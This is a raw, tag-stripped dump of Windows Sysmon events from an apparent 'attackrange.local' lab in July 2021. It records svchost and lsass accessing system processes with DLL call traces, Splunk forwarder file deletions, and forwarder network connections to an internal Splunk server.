08:05:41.110{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001053916Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.110{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053915Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.110{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001053914Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.110{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053913Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:41.110{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+67500|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053912Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.110{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001053911Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.110{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053910Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.110{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001053909Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.110{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053908Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:41.110{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+67500|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053907Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.094{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001053906Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.094{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053905Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.094{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001053904Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.094{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000810023Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:42.902{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE1CE398C0846A884002BAB59B90C0DD,SHA256=BCB4191A176138F3C12CACE7935E58BDC2E05C0208AC1699FFABBAE1BDC51562,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053945Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:42.509{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C40F1449BFF231DC0DB28C9C3A4D429,SHA256=F77C52B1539330B4C1DB65FF00083A5688CA7EFEF29D7BE56237B0CBD59A84F8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810022Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:41.222{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57436-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001053944Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:33.721{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61938-false10.0.1.12-8000- 23542300x8000000000000000810024Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:43.902{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98E85645F36F63E782C69ADAAEA947A6,SHA256=36300C888A9E92C8FAD77F3E3051DCE92F7B49B1584375BBCE4F5941D1224569,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053946Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:43.523{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C7F871160410A80B95985F39B12A938,SHA256=97E000BF2E93344A01E90380C63E5937FE22B17E5BFEAF8D2300A244EA343C6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810025Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:44.902{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DC472DB274671137437C0D6DF067AB1,SHA256=0880DC2062D5FEBA4EEFE77C4F80BFFD7234B61D9E06801666F0C49262912661,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053947Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:44.541{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13876A7C8C787FB051FFADED7CCC6490,SHA256=34F4CBA0DCFAF2A3959E2F6A683908B0F4B577707D42FEC7E5BF1970C891BDFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810026Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:45.933{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=965C52BE02A97F4C58F244A66A05BFA3,SHA256=A7886117F4763EBDB467CA3ADA596F3BA2A32EAD3C829073C709C153950B4892,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053966Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:45.842{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D87D-00000000CF01}4760C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053965Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:45.842{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053964Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:45.842{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053963Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:45.841{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 